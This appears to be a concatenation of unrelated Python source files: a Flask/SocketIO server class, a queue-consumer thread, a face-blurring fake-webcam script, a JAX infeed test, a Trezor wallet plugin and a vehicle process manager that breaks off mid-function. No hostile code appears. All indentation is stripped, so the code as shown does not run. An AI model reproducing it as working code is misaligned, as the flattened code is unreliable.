cgi.add_url_rule(key,view_func=self.routes.get(key),methods=self.method.get(key)) # methods=self.method.get(key), default: only GET
# cgi.before_request(f) # called before each request
# cgi.after_request(f) # called after each request
self.index = '%s/%s'%(self.args.get('path'),self.args.get('index'))
# no common handler possible, override error !
# request object parameter
# request.path /page
# request.script_root /myapplication
# request.base_url http://www.example.com/myapplication/page.html
# request.url http://www.example.com/myapplication/page.html?x=y
# request.url_root http://www.example.com/myapplication/
# request.method GET
# request.args {}
def index(self):
return render_template(self.index,title='muK.1nd3x'),200
def login(self):
return render_template('%s/70g1n.html'%self.args.get('path'),title='muK.70g1n'),200
def admin(self):
return render_template('%s/4Dm1n.html'%self.args.get('path'),title='muK.4Dm1n'),200
def drive(self):
return render_template('%s/d21v3.html'%self.args.get('path'),title='muK.d21v3'),200
class CgiWatchdogs(object):
def __init__(self):
self.events = {'got-user':self.decorate,'got-token':self.decorate}
self.args = {'user':None,'token':None}
self.watchdogs = {'custom':self.custom,'firebase':self.firebase}
def decorate(self,arguments):
from Process import decorate
return decorate(self,arguments)
def custom(self,f):
from functools import wraps
@wraps(f)
def decorated_function(*args, **kwargs):
if None == self.args.get('user'):
return redirect(url_for('login', next=request.url))
return f(*args, **kwargs)
return decorated_function
def firebase(self,f):
from functools import wraps
@wraps(f)
def decorated_function(*args, **kwargs):
if None == self.args.get('token'):
return redirect(url_for('login', next=request.url))
return f(*args, **kwargs)
return decorated_function
class Cgi(object):
def __init__(self,folder='%s/static'%getcwd()):
self.events = {'push-sio':self.push,'create-cgi':self.create,'cgi-options':self.decorate}
self.args = {'emitter':None,'host':'0.0.0.0','port':5000,'logger':None,'debug':False,'deamon':True
,'key':'ssl/host.key','crt':'ssl/host.crt','env':'production'}
from flask import Flask
self.cgi = Flask(__name__,template_folder=folder,static_folder=folder)
from flask_socketio import SocketIO
# async_mode eventlet|gevent|threading
self.socket = SocketIO(self.cgi,async_mode='threading',debug=self.args.get('debug')) # eventlet is best performance, but threading works
self.socket.on_error_default(self.error) # == @socketio.on_error_default | socketio.on_error(None)(handler)
from flask_login import LoginManager
self.login = LoginManager(self.cgi)
self.login.login_view = 'login' # == url_for(login) # name of the function
from glob import glob
path = '%s/static/errors/'%getcwd()
pages = glob('%s[1-5][0-9][0-9].html'%path)
for i, page in enumerate(pages):
pages[i] = int(page.replace(path,'').replace('.html',''))
CgiErrors().decorate({'errors':pages}).create(self.cgi)
CgiRoutes().decorate({'watchdog':'firebase'}).create(self.cgi)
def decorate(self,arguments):
from Process import decorate
return decorate(self,arguments)
def create(self,data={}):
self.cgi.config['HOST'] = self.args.get('host')
self.cgi.config['PORT'] = self.args.get('port')
self.cgi.config['DEBUG'] = self.args.get('debug')
self.cgi.config['ENV'] = self.args.get('env') # production|development
if not None == self.args.get('logger'):
# self.cgi.logger = self.args.get('logger') # error can't set attribute
if(0 < len(self.cgi.logger.handlers)):
self.cgi.logger.handlers.pop()
self.cgi.logger.addHandler(self.args.get('logger'))
from threading import Thread
self.thread = Thread(target=self.start)
self.thread.setDaemon(self.args.get('deamon'))
self.thread.start()
return self
def start(self):
self.cgi.run(host=self.args.get('host'),ssl_context=(self.args.get('crt'),self.args.get('key')))
return self
def error(self,error):
logging.error('default socket error %s'%str(error))
def push(self,data):
namespace = data.get('namespace')
self.socket.emit('response',{'call':'%s-got'%namespace,'id':'push-%s'%namespace,'data':data},namespace='/%s'%namespace)
|
consumer.py
|
#!/bin/env python
#===============================================================================
# NAME: consumer.py
#
# DESCRIPTION: This module is the consumer class. Class contains a thread
# which blocks on a queue for messages. The thread then
# executes conext specific data processing, and notifies
# observers with the processed data.
#
# AUTHOR: Brian Campuzano
# DATE CREATED: July 10, 2017
#
# Copyright 2017, California Institute of Technology.
# ALL RIGHTS RESERVED. U.S. Government Sponsorship acknowledged.
#===============================================================================
import Queue
import threading
from controllers import observer
# Make class an abstract base class
class Consumer(observer.Observable):
'''
Thread class that services a queue
'''
def __init__(self):
super(Consumer, self).__init__()
# Create Queue for events here
self._queue = Queue.Queue()
# Run flag
self.__run = False
# Store thread handle
self.__thread = threading.Thread()
def put_data(self, data):
self._queue.put(data)
def start_thread(self):
# Set run flag
self.__run = True
# create background event thread
self.__thread = threading.Thread(target=self.service_queue, args=[self._queue])
# state event thread here
self.__thread.start()
def stop_thread(self):
# Stop thread and wait for exit
self.__run = False
def process_data(self, data):
'''
Override function for data specific processing
'''
pass
def service_queue(self, queue):
'''
Queue up socket events for observer processing
'''
while self.__run:
try:
# Block on queue for 1 second in order to check exit condition
data = queue.get(True, 1)
except Queue.Empty:
continue
else:
self.process_data(data)
self.notifyObservers(data)
if __name__ == '__main__':
pass
|
main.py
|
import process
import server
import argparse
import cv2
import numpy as np
import pyfakewebcam # generating fake webcam on top of v4l2loopback-utils
import os
from multiprocessing import Process, Queue
def blur_frame(img, net, settings):
faces = process.find_faces_yolo(img, net)
# faces = process.find_faces_haar(img, args.classifier)
blurred_img = process.blur_faces(img, faces,
max_area=settings['max_face_size'],
blur_value=max(int(settings['blur_value']), 0),
blur_size=settings['blur_size'])
return blurred_img
def main(args, net, queue, debug=False):
if args.img is not None:
# If img is specified run on image
img = cv2.imread(args.img)
blurred_img = blur_frame(img, net, server.settings)
# show image
if args.out:
cv2.imwrite(args.out, blurred_img)
else:
out = np.hstack((img, blurred_img))
cv2.imshow('out', out)
cv2.waitKey()
else:
# run on video by default
cap = cv2.VideoCapture(args.cam)
height, width = 720, 1280
cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
cap.set(cv2.CAP_PROP_FPS, 60)
try:
fake = pyfakewebcam.FakeWebcam('/dev/video20', width, height) # setup fake
except FileNotFoundError:
# Need to initialize
os.system('./setup.sh')
fake = pyfakewebcam.FakeWebcam('/dev/video20', width, height) # setup fake
while True:
if queue.full():
server.settings = queue.get()
ret, img = cap.read()
blurred_img = blur_frame(img, net, server.settings)
blurred_img_rgb = cv2.cvtColor(blurred_img, cv2.COLOR_BGR2RGB) # switch BGR2RGB
fake.schedule_frame(blurred_img_rgb)
if debug:
out = np.hstack((img, blurred_img))
cv2.imshow('out', out)
if cv2.waitKey(1) & 0xff == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Blur out faces')
parser.add_argument('--img', type=str, help='File to blur')
parser.add_argument('--cam', type=int, help='Camera capture', default=0)
parser.add_argument('--classifier', type=str, help='Classifier xml file',
default='./cascades/haarcascade_frontalface_default.xml')
parser.add_argument('--out', type=str, help='Output file')
parser.add_argument('--cfg', type=str, help='cfg file',
default='./cfg/face-yolov3-tiny.cfg')
parser.add_argument('--weights', type=str, help='weights file',
default='./model-weights/face-yolov3-tiny_41000.weights')
parser.add_argument('--debug', help='Enable debug mode', action='store_true')
args = parser.parse_args()
net = process.generate_yolo_net(args.cfg, args.weights)
settings_queue = Queue(1)
server_process = Process(target=server.start_server, args=(settings_queue, ))
server_process.start()
main_process = Process(target=main, args=(args, net, settings_queue, args.debug))
main_process.start()
main_process.join()
|
infeed_test.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from absl.testing import absltest
import jax
from jax import lax, numpy as np
from jax.config import config
from jax.experimental import host_callback as hcb
from jax.lib import xla_client
import jax.test_util as jtu
import numpy as onp
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class InfeedTest(jtu.JaxTestCase):
def testInfeed(self):
@jax.jit
def f(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray((3, 4), np.float32),))
(z,), _ = lax.infeed(
token, shape=(jax.ShapedArray((3, 1, 1), np.float32),))
return x + y + z
x = onp.float32(1.5)
y = onp.reshape(onp.arange(12, dtype=onp.float32), (3, 4)) # onp.random.randn(3, 4).astype(onp.float32)
z = onp.random.randn(3, 1, 1).astype(onp.float32)
device = jax.local_devices()[0]
device.transfer_to_infeed((y,))
device.transfer_to_infeed((z,))
self.assertAllClose(f(x), x + y + z)
def testInfeedThenOutfeed(self):
hcb.stop_outfeed_receiver()
@jax.jit
def f(x):
token = lax.create_token(x)
y, token = lax.infeed(
token, shape=jax.ShapedArray((3, 4), np.float32))
token = lax.outfeed(token, y + onp.float32(1))
return lax.tie_in(token, x - 1)
x = onp.float32(7.5)
y = onp.random.randn(3, 4).astype(onp.float32)
execution = threading.Thread(target=lambda: f(x))
execution.start()
device = jax.local_devices()[0]
device.transfer_to_infeed((y,))
out, = device.transfer_from_outfeed(
xla_client.shape_from_pyval((y,)).with_major_to_minor_layout_if_absent())
execution.join()
self.assertAllClose(out, y + onp.float32(1))
def testInfeedThenOutfeedInALoop(self):
hcb.stop_outfeed_receiver()
def doubler(_, token):
y, token = lax.infeed(
token, shape=jax.ShapedArray((3, 4), np.float32))
return lax.outfeed(token, y * onp.float32(2))
@jax.jit
def f(n):
token = lax.create_token(n)
token = lax.fori_loop(0, n, doubler, token)
return lax.tie_in(token, n)
device = jax.local_devices()[0]
n = 10
execution = threading.Thread(target=lambda: f(n))
execution.start()
for _ in range(n):
x = onp.random.randn(3, 4).astype(onp.float32)
device.transfer_to_infeed((x,))
y, = device.transfer_from_outfeed(xla_client.shape_from_pyval((x,))
.with_major_to_minor_layout_if_absent())
self.assertAllClose(y, x * onp.float32(2))
execution.join()
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any
from zephyr_code.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from zephyr_code.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from zephyr_code.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from zephyr_code import constants
from zephyr_code.i18n import _
from zephyr_code.plugin import Device
from zephyr_code.transaction import deserialize, Transaction
from zephyr_code.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from zephyr_code.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from zephyr_code.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from .clientbase import TrezorClientBase
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 11, 0)
maximum_library = (0, 12)
SUPPORTED_XTYPES = ('standard', )
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def enumerate(self):
devices = trezorlib.transport.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "PIVX Testnet" if constants.net.TESTNET else "PIVX"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 24: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise UserFacingException(msg)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
client.get_xpub('m', 'standard', creating=is_creating_wallet)
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, xpub_path, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for _, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx, xpub_path, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
xpubs = [parse_xpubkey(x) for x in x_pubkeys]
multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
# find which key is mine
for xpub, deriv in xpubs:
if xpub in xpub_path:
xpub_n = parse_path(xpub_path[xpub])
txinputtype.address_n = xpub_n + deriv
break
prev_hash = bfh(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs, signatures=None):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
if signatures is None:
signatures = [b''] * len(pubkeys)
elif len(signatures) != len(pubkeys):
raise RuntimeError('Mismatched number of signatures')
else:
signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=signatures,
m=m)
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
deriv = parse_path("/%d/%d" % index)
multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
txoutputtype = TxOutputType(
multisig=multisig,
amount=amount,
address_n=parse_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx, xpub_path):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
t.inputs = self.tx_inputs(tx, xpub_path)
t.bin_outputs = [
TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
for vout in d['outputs']
]
return t
|
manager.py
|
#!/usr/bin/env python3.7
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
from common.basedir import BASEDIR, PARAMS
from common.android import ANDROID
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1195
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
os._exit(os.wait()[1])
if __name__ == "__main__":
unblock_stdout()
from common.spinner import Spinner
else:
from common.spinner import FakeSpinner as Spinner
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (50.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
print(line.decode('utf8'))
except Exception:
pass
if scons.returncode != 0:
if retry:
print("scons build failed, cleaning in")
for i in range(3,-1,-1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
raise RuntimeError("scons build failed")
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.swaglog import cloudlog
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common import android
from common.apk import update_apks, pm_apply_packages, start_frame
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.controls.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": ("selfdrive/locationd", ["./paramsd"]),
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
# "updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord', 'paramsd']
# processes to end if thermal conditions exceed Green parameters
green_temp_processes = ['uploader']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
]
if ANDROID:
persistent_processes += [
'logcatd',
'tombstoned',
'updated',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'dmonitoringd',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'ubloxd',
'locationd',
]
if ANDROID:
car_started_processes += [
'sensord',
'clocksd',
'gpsd',
'dmonitoringmodeld',
'deleter',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc],
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
